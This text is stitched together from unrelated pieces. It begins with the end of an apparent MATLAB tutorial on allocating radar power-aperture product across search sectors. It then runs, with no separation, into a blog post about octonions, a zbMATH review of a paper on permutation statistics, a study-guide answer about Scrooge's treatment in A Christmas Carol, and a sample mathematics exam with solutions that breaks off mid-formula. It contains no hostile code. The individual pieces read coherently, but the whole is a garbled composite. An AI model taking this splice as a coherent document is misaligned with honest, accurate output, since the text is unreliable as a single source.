
```
searchPAP = 371.5000
```

Set up the objective and the constraint functions.

```
% Objective function
fobj = @(x)helperQoSObjective(x, searchSectorParams, w);

% Constraint
fcon = @(x)helperQoSConstraint(x, searchPAP);
```

Set the lower and the upper bound on the QoS solution.

```
% Lower bound on the QoS solution
LB = 1e-6*ones(M, 1);

% Upper bound on the QoS solution
UB = maxUtilityPAP;
```

As the initial point for the optimization, distribute the available PAP according to the sector priority weights.

```
% Starting point
startPAP = w*searchPAP;
```

Show a summary of the search sector parameters used to set up the QoS optimization problem.
`helperSectorParams2Table(searchSectorParams)`

```
ans=12×4 table
              Parameter                     Horizon          Long-range      High-elevation
    __________________________________    ______________    ______________    ______________

    {'AzimuthLimits'                 }    {2x1 double }     {2x1 double }     {2x1 double } 
    {'ElevationLimits'               }    {2x1 double }     {2x1 double }     {2x1 double } 
    {'RangeLimit'                    }    {[     40000]}    {[     70000]}    {[     50000]}
    {'FrameTime'                     }    {[    0.5000]}    {[         6]}    {[         2]}
    {'OperationalLoss'               }    {[        22]}    {[        19]}    {[        24]}
    {'SystemNoiseTemperature'        }    {[       913]}    {[       913]}    {[       913]}
    {'CumulativeDetectionProbability'}    {[    0.9000]}    {[    0.9000]}    {[    0.9000]}
    {'FalseAlarmProbability'         }    {[1.0000e-06]}    {[1.0000e-06]}    {[1.0000e-06]}
    {'TargetRCS'                     }    {[         1]}    {[         1]}    {[         1]}
    {'TargetRadialSpeed'             }    {[       250]}    {[       250]}    {[       250]}
    {'ThresholdDetectionRange'       }    {[     25000]}    {[     45000]}    {[     30000]}
    {'ObjectiveDetectionRange'       }    {[     38000]}    {[     65000]}    {[     45000]}
```

Use `fmincon` to find an optimal resource allocation.

```
options = optimoptions('fmincon', 'Display', 'off');
papAllocation = fmincon(fobj, startPAP, [], [], [], [], LB, UB, fcon, options)
```

```
papAllocation = 1×3

   74.0879  114.0102  183.4018
```

Verify that this allocation satisfies the constraint and does not exceed the available PAP amount.

`sum(papAllocation)`

```
ans = 371.5000
```

Given the found PAP allocations for each sector, compute ${R}_{90}$ and the corresponding value of the utility.

`[~, optimalR90, utility] = helperQoSObjective(papAllocation, searchSectorParams, w)`

```
optimalR90 = 1×3
10^4 ×

    3.8000    5.4581    4.3006
```

```
utility = 1×3

    1.0000    0.4791    0.8671
```

For the horizon sector, plot the found optimal resource allocation on the PAP vs. ${R}_{90}$ curve and the corresponding utility value on the utility vs. ${R}_{90}$ curve.

```
helperPlotR90AndUtility(PAP, R90(1, :), searchSectorParams(1), papAllocation(1), optimalR90(1), maxUtilityPAP(1), '#0072BD');
sgtitle({sprintf('%s Sector', searchSectorParams(1).SectorName), '(High Priority)'})
```

These plots visualize the two-step transformation performed inside the QoS optimization. The first step computes ${R}_{90}$ from the PAP, while the second step computes the utility from ${R}_{90}$. To follow this transformation, start on the y-axis of the top subplot and choose a PAP value. Then find the corresponding point on the PAP vs. ${R}_{90}$ curve. Mark the ${R}_{90}$ value of this point on the x-axis. Using this ${R}_{90}$ value, find a point on the utility curve in the bottom subplot. Finally, find the corresponding utility on the y-axis of the bottom subplot. The same set of steps can be traced in reverse to go from the utility to the PAP.

The surveillance function in this example is set up such that the horizon sector has the highest priority. It also requires a much smaller PAP to achieve the objective ${R}_{90}$ compared to the other two sectors. The QoS optimization allocates about 74.1 W·m² of PAP to the horizon sector. This is practically equal to the amount allocated to this sector under the normal operational conditions, so the horizon sector utility approaches 1. Plot the optimization results for the long-range and the high-elevation sectors.
```
helperPlotR90AndUtility(PAP, R90(2, :), searchSectorParams(2), papAllocation(2), optimalR90(2), maxUtilityPAP(2), '#D95319');
sgtitle({sprintf('%s Sector', searchSectorParams(2).SectorName), '(Low Priority)'})
```

```
helperPlotR90AndUtility(PAP, R90(3, :), searchSectorParams(3), papAllocation(3), optimalR90(3), maxUtilityPAP(3), '#EDB120');
sgtitle({sprintf('%s Sector', searchSectorParams(3).SectorName), '(Medium Priority)'})
```

The QoS optimization allocates about 114.0 W·m² and 183.4 W·m² to the long-range and the high-elevation sectors respectively. This allocation results in an ${R}_{90}$ of about 54.6 km in the long-range sector, which corresponds to a utility of about 0.48. The ${R}_{90}$ range in the high-elevation sector is about 43 km and the utility is about 0.87. The high-elevation sector is favored by the QoS optimization over the long-range sector because the corresponding sector priority weight is higher.

Use the provided `helperDrawSearchSectors` helper function to visualize the radar search sectors with the optimal values of ${R}_{90}$ obtained from the QoS optimization. Then use a bar chart to plot the computed optimal PAP allocation and compare it to the PAP allocation under the normal operational conditions.

```
figure
tiledlayout(1, 6, 'TileSpacing', 'compact')
ax1 = nexttile([1 5]);
helperDrawSearchSectors(ax1, searchSectorParams, false, optimalR90);
title('MPAR Search Sectors When 50% of PAP Is Available')

nexttile
ax2 = bar(categorical(["Normal conditions", "50% available"]), [maxUtilityPAP; papAllocation], 'stacked');
set(gca(), 'YAxisLocation', 'right')
ylabel('Power-aperture product (W·m²)')
title('Resource Allocation')
grid on
```

#### Conclusions

This example develops a resource management scheme for the surveillance function of an MPAR with multiple search sectors. The example starts by defining the parameters of three search sectors: horizon, long-range, and high-elevation. It then introduces the QoS optimization problem as a resource allocation scheme. The cumulative detection range is used as a performance measure describing the quality of a search task, and utility functions based on the threshold and objective values are used to map the quality into the utility space. Finally, the example shows how to solve the QoS optimization problem numerically to obtain the optimal allocation of PAP to the search sectors.

#### References

1. James A. Scheer and William L. Melvin, Principles of Modern Radar: Radar Applications, Volume 3. United Kingdom: Institution of Engineering and Technology, 2013.

2. Barton, David Knox. Radar Equations for Modern Radar. Artech House, 2013.

3. Charlish, Alexander, Folker Hoffmann, Christoph Degen, and Isabel Schlangen. "The Development From Adaptive to Cognitive Radar Resource Management." IEEE Aerospace and Electronic Systems Magazine 35, no. 6 (June 1, 2020): 8-19.

4. Hoffmann, Folker, and Alexander Charlish. "A Resource Allocation Model for the Radar Search Function." In 2014 International Radar Conference, pp. 1-6. IEEE, 2014.

#### Supporting Functions

`helperSearchSector` Creates a struct with placeholders for the search sector parameters.

`type('helperSearchSector.m')`

```
function searchSector = helperSearchSector()
searchSector = struct('SectorName', [], 'AzimuthLimits', [], 'ElevationLimits', [], 'RangeLimit', [], ...
    'FrameTime', [], 'OperationalLoss', [], 'SystemNoiseTemperature', [], ...
    'CumulativeDetectionProbability', [], 'FalseAlarmProbability', [], 'TargetRCS', [], ...
    'TargetRadialSpeed', [], 'ThresholdDetectionRange', [], 'ObjectiveDetectionRange', []);
end
```

`helperCumulativeDetectionProbability` Computes the cumulative detection probability given the range, the SNR at the sector's range limit, and the sector parameters.

`type('helperCumulativeDetectionProbability.m')`

```
function Pc = helperCumulativeDetectionProbability(R, SNRm, searchSector)
% The expectation and the dependency of the number of scans N on the target
% range make the exact computation of the cumulative detection probability
% difficult. Instead, it could be conveniently approximated by linearly
% interpolating the lower bound expression
%
%   P_c(R) >= 0,                            when R <= Rm && R > Rm - dR
%   P_c(R) >= 1 - prod(1 - P_d(Rm - n*dR)), when R <= Rm - n*dR and n = 1:N
%
% computed at ranges Rm-k*dR, k=0,1,...

% Normalize range to the target popup range
R = R/searchSector.RangeLimit;

% Normalized target closure range
dR = searchSector.FrameTime*searchSector.TargetRadialSpeed/searchSector.RangeLimit;

Pfa = searchSector.FalseAlarmProbability;

SNRm = db2pow(SNRm(:).');
M = numel(SNRm);

Pc = zeros(numel(R), M);

idxs = R < 1;
r = R(idxs);
N = numel(r);
p = zeros(N, M);

for i = 1:N
    range = (1:-dR:max(r(i)-dR, 0)).';

    if dR > r(i) && range(end) ~= 0
        range = [range; 0];
    end

    Pd = zeros(numel(range), M);
    SNR = (range(2:end).^(-4))*SNRm;
    Pd(2:end,:) = 1 - cumprod(1 - Pfa.^(1./(1+SNR)), 1);

    p(i, :) = interp1(range, Pd, r(i));
end

Pc(idxs, :) = p;
end
```

`helperUtilityFunction` Utility function based on the threshold and objective detection ranges.

`type('helperUtilityFunction.m')`

```
function u = helperUtilityFunction(r, Rt, Ro)
u = zeros(size(r));
idxo = r > Ro;
u(idxo) = 1;
idxt = r < Rt;
u(idxt) = 0;
idxs = ~idxo & ~idxt;
u(idxs) = (r(idxs)-Rt)/(Ro-Rt);
end
```

`helperQoSObjective` Function that returns the weighted utility given the PAP allocations, the sector weights, and the sector parameters.

`type('helperQoSObjective.m')`

```
function [val, R90, utility] = helperQoSObjective(papAllocation, searchSectorParams, weights)
val = 0;

M = numel(searchSectorParams);
R90 = zeros(1, M);
utility = zeros(1, M);

for i = 1:M
    if papAllocation(i) > 0
        sectorVolume = solidangle(searchSectorParams(i).AzimuthLimits, searchSectorParams(i).ElevationLimits);
        snr = radareqsearchsnr(searchSectorParams(i).RangeLimit, papAllocation(i), sectorVolume, searchSectorParams(i).FrameTime, ...
            'RCS', searchSectorParams(i).TargetRCS, 'Ts', searchSectorParams(i).SystemNoiseTemperature, 'Loss', searchSectorParams(i).OperationalLoss);

        func = @(r)(helperCumulativeDetectionProbability(r, snr, searchSectorParams(i)) - searchSectorParams(i).CumulativeDetectionProbability);
        options = optimset('TolX', 0.00001);
        R90(i) = fzero(func, [1e-6 1] * searchSectorParams(i).RangeLimit, options);

        utility(i) = helperUtilityFunction(R90(i), searchSectorParams(i).ThresholdDetectionRange, searchSectorParams(i).ObjectiveDetectionRange);

        val = val - weights(i)*utility(i);
    end
end
end
```

`helperQoSConstraint` Function that defines the constraint on the total PAP.

`type('helperQoSConstraint.m')`

```
function [c, ceq] = helperQoSConstraint(pap, total)
c = [];
ceq = sum(pap) - total;
end
```
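As an optional sanity check (a sketch that assumes the workspace variables from this example, such as `Rt`, `Ro`, `w`, `papAllocation`, `searchPAP`, and `utility`, are still defined), the helpers can be exercised directly: the utility function should return 0 at a sector's threshold range and 1 at its objective range, the equality-constraint residual should be near zero when the full PAP budget is spent, and the weighted utility achieved with half of the nominal search PAP can be compared against its upper bound of 1.

```
% Optional sanity checks (sketch), reusing values computed in this example.

% The utility should be 0 at the threshold range and 1 at the objective range.
uAtThreshold = helperUtilityFunction(Rt(1), Rt(1), Ro(1))   % expected 0
uAtObjective = helperUtilityFunction(Ro(1), Rt(1), Ro(1))   % expected 1

% The equality constraint residual should be (numerically) zero when the
% optimizer spends the entire available PAP budget.
[~, ceq] = helperQoSConstraint(papAllocation, searchPAP)

% Weighted utility achieved with 50% of the nominal search PAP (at most 1,
% since the priority weights were normalized to sum to 1).
achievedWeightedUtility = w*utility.'
```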
## Saturday, April 30, 2011 ### War of the Octonions Forgot the String Wars, sometimes called the Loop vs String Wars, or better known in the modern era as the Woit-Motl War? Well, fret not, it's back! At the center of the action is a piece written by John Baez and John Huerta in the current issue of Scientific American. Of course, Peter Woit and Lubos Motl weigh in. Why not? Peter Woit's take, and some very interesting responses by John Baez, can be found at Woit's weblog Not Even Wrong, here . Lubos Motl's strong disagreements at his weblog The Reference Frame can be found, here. For a brief review (or an elementary education, even) for those who don't know what an Octonion is, it's one of 4 division algebras, the first one being the ordinary elementary algebra taught in high school (REAL), the second (COMPLEX) known to Calculus students and Engineers and Scientists worldwide, the other two (Quaternions and Octonions) being a bit more involved. For comparison purposes, they take the forms: R = a C = a + bi H = a + bi + cj + dk O = a + e1i  + e2j +e3k + e4l + e5m + e6n + e7o  , or something. In any event, it's just notation folks, don't let it scare you. The following probably has nothing to do with the above, but I ran into it looking for a cool picture for this post, rather than say just copying Lubos'. It's from Marni Dee Sheppeard's Arcadian Pseudofunctor: Feb. 7, 2011: ### Theory Update 61 In this supercool paper, the authors define a tripled Fano plane(yes, that's right, three copies of Furey's particle zoo). It describes a set of $21=3×7$ (left cyclic) modules over a noncommutative ring on eight elements. The ring is given by the upper triangular $2×2$ matrices over the field with two elements. Similarly for right cyclic modules. The authors are familiar with the connection between octonion physics and so called stringy black holes. They find it odd that this structure is not studied in physics.
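For concreteness (these are standard algebra facts, not something lifted from the Baez-Huerta article or the paper quoted above): the quaternion units satisfy

$i^2 = j^2 = k^2 = ijk = -1, \qquad ij = k,\ jk = i,\ ki = j,\ ji = -k,$

so $H$ is associative but no longer commutative. The Fano plane mentioned above is exactly the mnemonic for the octonion case: its seven points are the seven imaginary units, and each of its seven (oriented) lines behaves like a quaternionic triple $\{i, j, k\}$, with the orientation fixing the signs. Along the way associativity is lost (the octonions are only "alternative"), and by Hurwitz's theorem $R$, $C$, $H$ and $O$ are the only normed division algebras over the reals, which is a big part of why they keep turning up in these arguments.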
# zbMATH — the first resource for mathematics Statistics on wreath products, perfect matchings, and signed words. (English) Zbl 1063.05009 Summary: We introduce a natural extension of R. M. Adin, B. Brenti, and Y. Roichman’s major-index statistic nmaj on signed permutations [Adv. Appl. Math. 27, 210–224 (2001; Zbl 0995.05008)] to wreath products of a cyclic group with the symmetric group. We derive “insertion lemmas” which allow us to give simple bijective proofs that our extension has the same distribution as another statistic on wreath products introduced by R. M. Adin and Y. Roichman [Eur. J. Comb. 22, 431–446 (2001; Zbl 1058.20031)] called the flag major index. We also use our insertion lemmas to show that nmaj, the flag major index, and an inversion statistic have the same distribution on a subset of signed permutations in bijection with perfect matchings. We show that this inversion statistic has an interpretation in terms of $$q$$-counting rook placements on a shifted Ferrers board. Many results on permutation statistics extend to results on multiset permutations (words). We derive a number of analogous results for signed words, and also words with higher-order roots of unity attached to them. ##### MSC: 05A15 Exact enumeration problems, generating functions 05A05 Permutations, words, matrices ##### Keywords: Major-index statistics; rook theory; permutation statistics Full Text: ##### References: [1] Adin, R.M.; Brenti, F.; Roichman, Y., Descent numbers and major indices for the hyperoctahedral group, Adv. appl. math., 27, 210-224, (2001) · Zbl 0995.05008 [2] Adin, R.M.; Roichman, Y., The flag major index and group actions on polynomial rings, European J. combin., 22, 431-446, (2001) · Zbl 1058.20031 [3] Andrews, G.E., The theory of partitions, () · Zbl 0155.09302 [4] Bourbaki, N., Groupes et algèbres de Lie, (1968), Hermann Paris, (Chapters 4-6) [5] Foata, D., On the netto inversion number of a sequence, Proc. amer. math. soc., 19, 236-240, (1968) · Zbl 0157.03403 [6] Clarke, R.J.; Foata, D., Eulerian calculus. I. univariable statistics, European J. combin., 15, 345-362, (1994) · Zbl 0811.05069 [7] Clarke, R.J.; Foata, D., Eulerian calculus. II. an extension of han’s fundamental transformation, European J. combin., 16, 221-252, (1995) · Zbl 0822.05066 [8] Clarke, R.J.; Foata, D., Eulerian calculus. III. the ubiquitos Cauchy formula, European J. combin., 16, 329-355, (1995) · Zbl 0826.05058 [9] Foata, D.; Krattenthaler, C., Graphical major indices. II, Sém. lothar. combin., 34, (1995), Art. B34k, p. 16 (electronic) · Zbl 0855.05005 [10] Foata, D.; Schützenberger, M., Major index and inversion number of permutations, Math. nachr., 83, 143-159, (1978) · Zbl 0319.05002 [11] Haglund, J.; Remmel, J.B., Rook theory for perfect matchings, Adv. appl. math., 27, 438-481, (2001) · Zbl 1017.05015 [12] Humphreys, J.E., Reflection groups and Coxeter groups, (), (Chapter 3) · Zbl 0173.03001 [13] Kane, R., Reflection groups and invariant theory, (2001), Springer-Verlag New York · Zbl 0986.20038 [14] Knuth, D.E., () [15] MacMahon, Major P.A., () [16] Rawlings, D., The $$r$$-major index, J. combin. theory ser. A, 31, 175-183, (1981) · Zbl 0475.05005 [17] Reiner, V., Signed permutation statistics, European J. combin., 14, 553-567, (1993) · Zbl 0793.05005 [18] Reiner, V., Signed permutation statistics and cycle type, European J. combin., 14, 569-579, (1993) · Zbl 0793.05006 [19] Reiner, V., Upper binomial posets and signed permutation statistics, European J. 
combin., 14, 581-588, (1993) · Zbl 0793.05007 [20] Steingrimsson, E., Permutation statistics of indexed permutations, European J. combin., 15, 187-205, (1994) · Zbl 0790.05002 [21] Stanley, R.P., ()
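For readers who have not met major-index statistics before, a minimal worked example of the classical (unsigned) case may help; the definitions below are standard and are only the starting point that the paper generalizes to signed words and wreath products. For a word $w=w_1w_2\cdots w_n$, the major index is the sum of the positions of its descents, $\mathrm{maj}(w)=\sum_{i:\,w_i>w_{i+1}} i$, and the inversion number is $\mathrm{inv}(w)=\#\{(i,j): i<j,\ w_i>w_j\}$. For the permutation $w=3\,1\,4\,2$ the descents are at positions 1 and 3, so $\mathrm{maj}(w)=1+3=4$, while $\mathrm{inv}(w)=3$ (the inverted pairs are $(3,1)$, $(3,2)$ and $(4,2)$). MacMahon's classical result that $\mathrm{maj}$ and $\mathrm{inv}$ are equidistributed over the symmetric group is the prototype for the equidistribution statements proved in the paper.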
# How did people treat Scrooge? Stave one People treated Scrooge with the utmost respect and deference. Note, this doesn't reflect how they saw him as a person, but rather how they behaved toward him. The people who weren't required to interact with Scrooge generally said nothing and did nothing. They looked the other way and tried to stay out of his path. No one who didn't have business with the man approached him. "Nobody ever stopped him in the street to say, with gladsome looks, My dear Scrooge, how are you? When will you come to see me?' No beggars implored him to bestow a trifle, no children asked him what it was o'clock, no man or woman ever once in all his life inquired the way to such and such a place, of Scrooge. Even the blind men's dogs appeared to know him; and when they saw him coming on, would tug their owners into doorways and up courts; and then would wag their tails as though they said, No eye at all is better than an evil eye, dark master!' Scrooge's nephew wanted nothing more than to include and spend time with him. A merry Christmas, uncle! God save you!' cried a cheerful voice. It was the voice of Scrooge's nephew, who came upon him so quickly that this was the first intimation he had of his approach. Bah!' said Scrooge, Humbug!' He had so heated himself with rapid walking in the fog and frost, this nephew of Scrooge's, that he was all in a glow; his face was ruddy and handsome; his eyes sparkled, and his breath smoked again. Christmas a humbug, uncle!' said Scrooge's nephew. You don't mean that, I am sure?' And his clerk..... You'll want all day to-morrow, I suppose?' said Scrooge. If quite convenient, sir.' It's not convenient,' said Scrooge, and it's not fair. If I was to stop half-a-crown for it, you'd think yourself ill-used, I'll be bound?' The clerk smiled faintly. And yet,' said Scrooge, you don't think me ill-used, when I pay a day's wages for no work.' The clerk observed that it was only once a year. A poor excuse for picking a man's pocket every twenty-fifth of December!' said Scrooge, buttoning his great-coat to the chin. `But I suppose you must have the whole day. Be here all the earlier next morning.' The clerk promised that he would; and Scrooge walked out with a growl. ##### Source(s) A Christmas Carol
2020 MATRICULATION EXAMINATION Sample Question Set (3) MATHEMATICS                        Time allowed: 3hours WRITE YOUR ANSWERS IN THE ANSWER BOOKLET. SECTION (A) (Answer ALL questions.) 1 (a).     Let $\displaystyle f:R\backslash \{\pm 2\}\to R$ be a function defined by $\displaystyle f(x)=\frac{{3x}}{{{{x}^{2}}-4}}$.Find the positive value of $z$ such that $f(z) = 1$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}f(x)=\displaystyle \frac{{3x}}{{{{x}^{2}}-4}}\\[2ex]f(z)=1\\[2ex]\displaystyle \frac{{3z}}{{{{z}^{2}}-4}}=1\\[2ex]{{z}^{2}}-4=3z\\[2ex]{{z}^{2}}-3z-4=0\\[2ex](z+1)(z-4)=0\\[2ex]z=-1\ \text{or}\ z=4\\[2ex]\text{Since }z>0,\ z=4\end{array}$ 1(b).     If the polynomial $x^3 - 3x^2 + ax - b$ is divided by $(x - 2 )$ and $(x + 2)$, the remainders are $21$ and $1$ respectively. Find the values of $a$ and $b$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Let}\ f(x)={{x}^{3}}-3{{x}^{2}}+ax-b\\[2ex]\text{When}\ f(x)\ \text{is divided by }(x-2),\ \\[2ex]\text{The remainder is }21.\\[2ex]f(2)=21\\[2ex]{{(2)}^{3}}-3{{(2)}^{2}}+a(2)-b=21\\[2ex]2a-b=25\ --------(1)\\[2ex]\text{When}\ f(x)\ \text{is divided by }(x+2),\ \\[2ex]\text{The remainder is }1.\\[2ex]f(-2)=1\\[2ex]{{(-2)}^{3}}-3{{(-2)}^{2}}+a(-2)-b=1\\[2ex]2a+b=-21\ --------(2)\\[2ex](1)+(2)\Rightarrow 4a=4\Rightarrow a=1\\[2ex](1)-(2)\Rightarrow -2b=46\Rightarrow b=-23\end{array}$ 2(a).     Find the middle term in the expansion of $(x^2 - 2y)^{10}$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{(r+1)}^{{\text{th}}}}\ \text{term in the expansion of }{{({{x}^{2}}-2y)}^{{10}}}={}^{{10}}{{C}_{r}}{{\left( {{{x}^{2}}} \right)}^{{10-r}}}{{\left( {-2y} \right)}^{r}}\text{ }\\[2ex]\text{middle term in the expansion of }{{({{x}^{2}}-2y)}^{{10}}}={{6}^{{\text{th}}}}\ \text{term}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ={{(5+1)}^{{\text{th}}}}\ \text{term}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ={}^{{10}}{{C}_{5}}{{\left( {{{x}^{2}}} \right)}^{{10-5}}}{{\left( {-2y} \right)}^{5}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{10\times 9\times 8\times 7\times 6}}{{1\times 2\times 3\times 4\times 5}}{{x}^{{10}}}\left( {-32{{y}^{5}}} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =-8064{{x}^{{10}}}{{y}^{5}}\end{array}$ 2(b).     In a sequence if $u_1=1$ and $u_{n+1}=u_n+3(n+1)$, find $u_5$ . (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{u}_{1}}=1,\ {{u}_{{n+1}}}={{u}_{n}}+3(n+1)\\[2ex]\therefore {{u}_{2}}={{u}_{{1+1}}}={{u}_{1}}+3(1+1)=1+6=7\\[2ex]\ \ \ {{u}_{3}}={{u}_{{2+1}}}={{u}_{2}}+3(2+1)=7+9=16\\[2ex]\ \ \ {{u}_{4}}={{u}_{{3+1}}}={{u}_{3}}+3(3+1)=16+12=28\\[2ex]\ \ \ {{u}_{5}}={{u}_{{4+1}}}={{u}_{4}}+3(4+1)=28+15=43\end{array}$ 3(a).     If $\displaystyle P=\left( {\begin{array}{*{20}{c}} x & {-4} \\ {8-y} & {-9} \end{array}} \right)$ and $\displaystyle {{P}^{{-1}}}=\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\ {-7y} & 3 \end{array}} \right)$, find the values of $x$ and $y$. 
(3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}P=\left( {\begin{array}{*{20}{c}} x & {-4} \\[2ex] {8-y} & {-9} \end{array}} \right),\ {{P}^{{-1}}}=\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\[2ex] {-7y} & 3 \end{array}} \right)\\[2ex]\text{Since}\ P{{P}^{{-1}}}=I,\\[2ex]\left( {\begin{array}{*{20}{c}} x & {-4} \\[2ex] {8-y} & {-9} \end{array}} \right)\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\[2ex] {-7y} & 3 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\left( {\begin{array}{*{20}{c}} {-3{{x}^{2}}+28y} & {4x-12} \\[2ex] {-24x+3xy+63y} & {5-4y} \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\therefore -3{{x}^{2}}+28y=1\Rightarrow y=\displaystyle \frac{{3{{x}^{2}}+1}}{{28}}\\[2ex]\ \ \ 4x-12=0\Rightarrow x=3\\[2ex]\ \ -24x+3xy+63y=0\\[2ex]\ \ \ 5-4y=1\Rightarrow y=1\\[2ex]\therefore \ x=3\ \text{and}\ y=1.\end{array}$ 3(b).     A bag contains tickets, numbered $11, 12, 13, ...., 30$. A ticket is taken out from the bag at random. Find the probability that the number on the drawn ticket is (i) a multiple of $7$ (ii) greater than $15$ and a multiple of $5$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Set of possible outcomes}\ =\{11,\ 12,\ 13,\ ...,\ 30\}\\[2ex]\text{Number of possible outcomes}\ =20\\[2ex]\text{Set of favourable outcomes}\ \text{for a number }\\[2ex]\text{multiple of 7= }\!\!\{\!\!\text{ 14,}\ \text{21,}\ \text{28 }\!\!\}\!\!\text{ }\\[2ex]\text{Number of favourable outcomes}\ =3\\[2ex]P(\text{a number multiple of 7)}=\displaystyle \frac{3}{{20}}\\[2ex]\text{Set of favourable outcomes}\ \text{for a number }\\[2ex]\text{greater than 15 and a multiple of 5 = }\!\!\{\!\!\text{ }\ \text{20,}\ \text{25,}\ \text{30 }\!\!\}\!\!\text{ }\\[2ex]\text{Number of favourable outcomes}\ =3\\[2ex]P(\text{a number greater than 15 and amultiple of 5)}=\displaystyle \frac{3}{{20}}\end{array}$ 4(a).     Draw a circle and a tangent $TAS$ meeting it at $A$. Draw a chord $AB$ making $\displaystyle \angle TAB=\text{ }60{}^\circ$ and another chord $BC \parallel TS$. Prove that $\triangle ABC$ is equilateral. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Since}\ BC\parallel TS,\\[2ex]\ \ \ \beta =\angle TAB\ \ \ [\text{alternating }\angle \text{s }\!\!]\!\!\text{ }\\[2ex]\therefore \beta =60{}^\circ \\[2ex]\ \ \ \gamma =\angle TAB\ \ \ [\angle \text{ between tangent and chord}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \text{ }\text{=}\angle \ \text{in alternate segment }\!\!]\!\!\text{ }\\[2ex]\therefore \gamma =60{}^\circ \\[2ex]\text{Since}\ \alpha +\beta +\gamma =180{}^\circ ,\\[2ex]\alpha =180{}^\circ -(\beta +\gamma )\\[2ex]\alpha =180{}^\circ -(60{}^\circ +60{}^\circ )\\[2ex]\therefore \alpha =60{}^\circ \\[2ex]\therefore \alpha =\beta =\gamma \\[2ex]\therefore \ \triangle ABC\ \text{is equilateral}\text{.}\end{array}$ 4(b).     If $\displaystyle 3~\overrightarrow{{OA}}-2\overrightarrow{{OB}}-\overrightarrow{{OC}}~=\vec{0}$, show that the points $A, B$ and $C$ are collinear. 
(3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\ \ \ 3~\overrightarrow{{OA}}-2\overrightarrow{{OB}}-\overrightarrow{{OC}}~=\vec{0}\\[2ex]\therefore 2~\overrightarrow{{OA}}-2\overrightarrow{{OB}}+\overrightarrow{{OA}}-\overrightarrow{{OC}}~=\vec{0}\\[2ex]\ \ \ 2~\left( {\overrightarrow{{OA}}-\overrightarrow{{OB}}} \right)+\left( {\overrightarrow{{OA}}-\overrightarrow{{OC}}} \right)~=\vec{0}\\[2ex]\ \ \ 2\overrightarrow{{BA}}+\overrightarrow{{CA}}=\vec{0}\\[2ex]\therefore 2\overrightarrow{{BA}}=-\overrightarrow{{CA}}\\[2ex]\therefore 2\overrightarrow{{BA}}=\overrightarrow{{AC}}\\[2ex]\therefore \ A,\ B\ \text{and }C\ \text{are collinear}\text{.}\end{array}$ 5(a).     Solve the equation $2 \sin x \cos x -\cos x + 2\sin x - 1 = 0$ for $\displaystyle 0{}^\circ \le x\le \text{ }360{}^\circ$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{For}\ 0{}^\circ \le x\le \text{ }360{}^\circ ,\\[2ex]2\sin x\cos x-\cos x+2\sin x-1=0\\[2ex]\cos x\left( {2\sin x-1} \right)+\left( {2\sin x-1} \right)=0\\[2ex]\left( {2\sin x-1} \right)\left( {\cos x+1} \right)=0\\[2ex]\therefore \sin x=\displaystyle \frac{1}{2}\ \text{or}\ \cos x=-1\\[2ex](\text{i})\ \sin x=\displaystyle \frac{1}{2}\\[2ex]\ \ \ \ x=30{}^\circ \ \text{or}\ x=150{}^\circ \\[2ex](\text{ii})\ \cos x=-1\\[2ex]\ \ \ \ \ x=180{}^\circ \\[2ex]\therefore x=30{}^\circ \ \text{or}\ x=150{}^\circ \ \text{or}\ x=180{}^\circ \end{array}$ 5(b).     Differentiate $\displaystyle y=\frac{1}{{\sqrt[3]{x}}}$ from the first principles. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}y=\displaystyle \frac{1}{{\sqrt[3]{x}}}\\[2.5ex]y+\delta y=\displaystyle \frac{1}{{\sqrt[3]{{x+\delta x}}}}\\[2.5ex]\delta y=\displaystyle \frac{1}{{\sqrt[3]{{x+\delta x}}}}-\displaystyle \frac{1}{{\sqrt[3]{x}}}\\[2.5ex]\delta y=\displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\\[2.5ex]\displaystyle \frac{{\delta y}}{{\delta x}}=\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{\delta x}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{x+\delta x-x}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{{{{\left( 